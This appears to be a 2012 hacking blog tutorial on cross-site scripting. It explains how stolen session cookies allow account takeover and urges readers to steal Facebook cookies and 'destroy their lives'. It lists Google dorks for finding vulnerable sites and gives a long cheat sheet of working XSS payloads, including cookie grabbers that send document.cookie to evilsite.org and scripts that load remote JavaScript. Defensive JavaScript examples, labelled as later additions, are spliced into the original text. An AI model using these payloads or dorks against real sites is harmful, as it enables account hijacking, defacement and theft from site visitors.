BASIC HACK

Tuesday 9 October 2012

--XSS CrOss Site ScriPting

What is Xss?

Explanation.

The full name for XSS is cross site scripting.
You can take this name literally, because we inject right into the site, into its inputs,
changing or editing the HTML. This gives us the advantage of gathering user information if they click the malicious input. Cross site scripting is injecting JavaScript and HTML into the inputs of a site.

What is a cookie?

A cookie is a piece of data that contains information the site uses to know exactly where you are at the moment.
Most likely, if you have no cookie you can't stay logged in.

We use this variable to log in on that site with their cookie,
which will give us access to their account and more.
It's not only the current site's cookie you can steal.
You can steal their Facebook cookies :D
So you're not only having fun on their site.
Go have fun and destroy their lives!
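The reason a stolen cookie works is that the session cookie is readable from page script. Below is an added example, not code from the original post, showing the server-side check a site should make before it ships a login response: it parses a Set-Cookie header and reports whether the cookie is missing HttpOnly (which keeps it out of document.cookie), Secure and SameSite, then builds a hardened header. The cookie name and values are constructed for the example.

```javascript
// Added example (not from the original post): audit Set-Cookie headers for
// the attributes that blunt cookie theft through injected script.
//   HttpOnly  - the cookie is not exposed through document.cookie
//   Secure    - the cookie is only sent over HTTPS
//   SameSite  - the cookie is not sent on cross-site requests (Lax/Strict)
// The header strings below are constructed sample values.

// Parse one Set-Cookie header value into its name, value and attributes.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    httpOnly: false,
    secure: false,
    sameSite: null,
  };
  for (const attr of attrs) {
    const [k, v] = attr.split('=');
    const key = k.trim().toLowerCase();
    if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
    else if (key === 'samesite') cookie.sameSite = (v || '').trim();
  }
  return cookie;
}

// Return the list of findings for a session cookie; empty when it is hardened.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.httpOnly) findings.push('missing HttpOnly: readable via document.cookie');
  if (!c.secure) findings.push('missing Secure: sent over plaintext HTTP');
  if (!c.sameSite || c.sameSite.toLowerCase() === 'none') {
    findings.push('SameSite not set to Lax or Strict');
  }
  return findings;
}

// Build a hardened Set-Cookie header for a session identifier.
function hardenedSessionCookie(name, value) {
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed samples: a bare PHP-style session cookie and its hardened form.
const WEAK_HEADER = 'PHPSESSID=abc123; Path=/';
const STRONG_HEADER = hardenedSessionCookie('PHPSESSID', 'abc123');

console.log('weak  :', auditSessionCookie(WEAK_HEADER));
console.log('strong:', auditSessionCookie(STRONG_HEADER));
```

With HttpOnly set, the `document.cookie` grabbers further down this page return an empty string for the session cookie even when the injection itself succeeds, which is why the attribute is worth checking on every login response.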

Different Types.

The 3 most seen types.
Probably the only ones you will see.

Non-persistent XSS / reflected XSS attack
This means that our malicious code is not permanent
and only appears at the time we inject it.
This is not very useful; we want persistent XSS!

Persistent XSS / stored XSS attack
This means the malicious code is permanent.
The output from this code will be seen by all users!
If we put a cookie stealing script in there,
it would log all users visiting that link,
providing us with information to log in on their accounts.

DOM-based XSS
Last but not least.
Our malicious code will be permanent,
but it will output differently due to the type:
it outputs an unexpected result.
In some cases this can't do harm;
in other cases the code can fail,
or it will be noticed by an admin before you can use it.

Part 2. Checking XSS vulnerability.

This is quite simple.
But first we need to look for a vulnerable one.

Searching for vulnerability.

We have to look for all kinds of inputs!
for example:

Code:
shoutbox, searchbox, forums, comment space, blogs, login place, many more...

So, use Google and look for these.

Testing vulnerability.
So now we use our script in one of the inputs.

script1:
Code:
<script>alert("xss");</script>
(You created a custom error saying xss)

Sometimes admins block the word xss or the " character,
or other words. We can change this.

script2:
Code:
<script>alert('test');</script>
(Now you created an error with test, obviously)

But you can also put names or other stuff.

Code:
<script>alert("real steel");</script>
This will output my name.
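The same test strings are exactly what a site operator should be watching for in the web server logs. The following is an added example, not code from the original post: it scans constructed access log lines, URL-decodes each request target (the probes usually arrive percent-encoded) and flags requests whose query carries script tags, inline event handlers or a javascript: URL. The log lines, client addresses and paths are constructed for the example.

```javascript
// Added example (not from the original post): detect XSS probes in
// web-server access logs. All log lines below are constructed samples.

const LOG_LINES = [
  '10.0.0.5 - - [09/Oct/2012:10:15:01 +0000] "GET /search.php?q=shoes HTTP/1.1" 200 512',
  '10.0.0.9 - - [09/Oct/2012:10:15:07 +0000] "GET /search.php?q=%3Cscript%3Ealert(%22xss%22)%3B%3C%2Fscript%3E HTTP/1.1" 200 640',
  '10.0.0.9 - - [09/Oct/2012:10:15:09 +0000] "GET /guestbook.php?msg=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1" 200 300',
  '10.0.0.2 - - [09/Oct/2012:10:16:00 +0000] "GET /index.php HTTP/1.1" 200 1024',
];

// Patterns covering the probe shapes shown in this post. Matched against the
// decoded request target, so encoding tricks do not hide them.
const XSS_PATTERNS = [
  /<\s*script/i,          // <script> and </script> tags
  /<\s*img[^>]*onerror\s*=/i, // <img ... onerror=...>
  /\bon\w+\s*=/i,         // any inline handler: onload=, onmouseover=, ...
  /javascript\s*:/i,      // javascript: URLs in src/href attributes
];

// Pull the request target (path + query) out of a common-log-format line.
function requestTarget(line) {
  const m = line.match(/"(?:GET|POST) (\S+) HTTP/);
  return m ? m[1] : null;
}

// Decode '+' and percent-escapes; a malformed escape falls back to the raw text.
function decodeTarget(target) {
  try {
    return decodeURIComponent(target.replace(/\+/g, ' '));
  } catch (e) {
    return target;
  }
}

// Return one hit per suspicious request: client address, decoded target and
// the number of patterns that matched.
function scanLogs(lines) {
  const hits = [];
  for (const line of lines) {
    const target = requestTarget(line);
    if (!target) continue;
    const decoded = decodeTarget(target);
    const matched = XSS_PATTERNS.filter((p) => p.test(decoded)).length;
    if (matched > 0) {
      hits.push({ client: line.split(' ')[0], target: decoded, matched });
    }
  }
  return hits;
}

for (const hit of scanLogs(LOG_LINES)) {
  console.log(`${hit.client} -> ${hit.target} (${hit.matched} pattern(s))`);
}
```

The loose handler pattern (`\bon\w+\s*=`) will also fire on harmless parameters such as `?one=1`, so in practice this kind of rule is a triage signal that is correlated with the client address and the response size, not an automatic block.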

Part 3. Changing content!

Insert deface page.

Redirecting to another page:
Code:
<script>window.open("http://www.yoursite.com/")</script>

Insert text or images.

Images.
Code:
<img src="image url here"></img>

Plain text.
Code:
<b> You got owned by real steel!</b>

How does it happen?

It happens within the code of the webpage. Take a look at this source.

<tr><td>Name</td><td><input type="text" name="customer_name" value=""></td></tr>

As you see, the value attribute is still empty, so it is filled with whatever an attacker enters, for example through the search box. In other words, data entered into the search box by the attacker is inserted directly into the value= of the markup above. This can be manipulated, for example:

We want to add this code, which would insert a pop-up box on the page displaying "XSS".

"><script>alert("XSS")</script>

If we add that to the search box of the vulnerable website and we view the page source code it now looks like this:

<tr><td>Name</td><td><input type="text" name="customer_name" value=""><script>alert("XSS")</script>"></td></tr>

In the attacker's browser the URL would look like this:

http://www.vulnXSSsite.com/search.php?q="><script>alert("XSS")</script>

This is basically what we can refer to as unsanitized input being passed to the webserver through poor coding by the webmaster of the vulnerable site. This is what XSS boils down to: poorly coded script in functions and search boxes that do not filter their input and so allow malicious, unsanitized code to pass through and be displayed by the webserver.
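The fix on the webmaster's side is output encoding. As an added example (not code from the original post), the snippet below renders the same "Name" field two ways: renderUnsafe() splices the query value straight into the markup, which is the pattern the post describes, and renderSafe() HTML-escapes it first so the browser treats the whole value as text. It also pulls the q parameter out of a URL shaped like the one above. The payload and the URL are the post's own; the function names are this example's.

```javascript
// Added example (not from the original post): the vulnerable rendering of the
// customer_name field next to its escaped form.

// The test input used in the post.
const PAYLOAD = '"><script>alert("XSS")</script>';

// Escape the characters that can terminate an attribute or open a tag.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the value is concatenated into the HTML unchanged.
function renderUnsafe(q) {
  return `<tr><td>Name</td><td><input type="text" name="customer_name" value="${q}"></td></tr>`;
}

// Hardened: the value is escaped for the attribute context before insertion.
function renderSafe(q) {
  return `<tr><td>Name</td><td><input type="text" name="customer_name" value="${escapeHtml(q)}"></td></tr>`;
}

// True when a script tag exists in the markup, i.e. the input broke out of
// value="..." and will be parsed as an element rather than as text.
function hasInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

// Extract the q parameter from a request URL; the URL parser decodes it.
function queryFromUrl(url) {
  return new URL(url).searchParams.get('q');
}

const q = queryFromUrl('http://www.vulnXSSsite.com/search.php?q="><script>alert("XSS")</script>');
console.log('unsafe:', renderUnsafe(q));
console.log('safe  :', renderSafe(q));
```

Escaping must match the context the value lands in: the attribute context here needs `"` encoded, while a value written inside a `<script>` block or a URL needs different rules, which is why frameworks expose separate encoders per context.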

Dorks to find xss vuln sites (I searched google for these):


for persistent:

allinurl:"guestbook.php"
allinurl:"g_book.php"
allinurl:"sign_book.php"

for non-persistent:

inurl:search.php?query=
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=

DIFFERENT XSS CHEATS:
'';!--"<XSS>=&{()}

'>//\\,<'>">">"*"

'); alert('XSS

<script>alert(1);</script>

<script>alert('XSS');</script>

<IMG SRC="jalert('XSS');">

<IMG SRC=jalert('XSS')>

<IMG SRC=jalert('XSS')>

<IMG SRC=jalert(&quot;XSS&quot;)>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<script src="http://www.evilsite.org/cookiegrabber.php"></script>

<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>

<scr<script>ipt>alert('XSS');</scr</script>ipt>

<script>alert(String.fromCharCode(88,83,83))</script>

<img src=foo.png onerror=alert(/xssed/) />

<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>

<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>

<marquee><script>alert('XSS')</script></marquee>

<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">

<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">

<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">

<IMG SRC=jalert(String.fromCharCode(88,83,83))>

"><script>alert(0)</script>

<script src=http://yoursite.com/your_files.js></script>

</title><script>alert(/xss/)</script>

</textarea><script>alert(/xss/)</script>

<IMG LOWSRC=\"jalert('XSS')\">

<IMG DYNSRC=\"jalert('XSS')\">

<font style='color:expression(alert(document.cookie))'>

<img src="jalert('XSS')">

<script language="JavaScript">alert('XSS')</script>

<body onunload="jalert('XSS');">

<body onLoad="alert('XSS');"

[color=red' onmouseover="alert('xss')"]mouse over[/color]

"/></a></><img src=1.gif onerror=alert(1)>

window.alert("Bonjour !");

<div style="x:expression((window.r==1)?'':eval('r=1;

alert(String.fromCharCode(88,83,83));'))">

<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>

"><script alert(String.fromCharCode(88,83,83))</script>

'>><marquee><h1>XSS</h1></marquee>

'">><script>alert('XSS')</script>

'">><marquee><h1>XSS</h1></marquee>

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=jalert('XSS');\">

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=jalert('XSS');\">

<script>var var = 1; alert(var)</script>

<STYLE type="text/css">BODY{background:url("jalert('XSS')")}</STYLE>

<?='<SCRIPT>alert("XSS")</SCRIPT>'?>

<IMG SRC='vbscript:msgbox(\"XSS\")'>

" onfocus=alert(document.domain) "> <"

<FRAMESET><FRAME SRC=\"jalert('XSS');\"></FRAMESET>

<STYLE>li {list-style-image: url(\"jalert('XSS')\");}</STYLE><UL><LI>XSS

perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out

perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out

<br size=\"&{alert('XSS')}\">

<scrscriptipt>alert(1)</scrscriptipt>

</br style=a:expression(alert())>

</script><script>alert(1)</script>

"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

[color=red width=expression(alert(123))][color]

<BASE HREF="jalert('XSS');//">

Execute(MsgBox(chr(88)&chr(83)&chr(83)))<

"></iframe><script>alert(123)</script>

<body onLoad="while(true) alert('XSS');">

'"></title><script>alert(1111)</script>

</textarea>'"><script>alert(document.cookie)</script>

'""><script language="JavaScript"> alert('X \nS \nS');</script>

</script></script><<<<script><>>>><<<script>alert(123)</script>

<html><noalert><noscript>(123)</noscript><script>(123)</script>

<INPUT TYPE="IMAGE" SRC="jalert('XSS');">

'></select><script>alert(123)</script>

'>"><script src = 'http://www.site.com/XSS.js'></script>

}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>

<SCRIPT>document.write("XSS");</SCRIPT>

a="get";b="URL";c="j";d="alert('xss');";eval(a+b+c+d);

='><script>alert("xss")</script>

<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>

<body background=j'"><script>alert(navigator.userAgent)</script>></body>

">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>

">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>

src="http://www.site.com/XSS.js"></script>

data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

!--" /><script>alert('xss');</script>

<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>

"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>

'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>

<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>

<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>

"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>

'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>

<iframe src="jalert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>

HoPe ThiS Will HeLp YOu
THAnKs.....
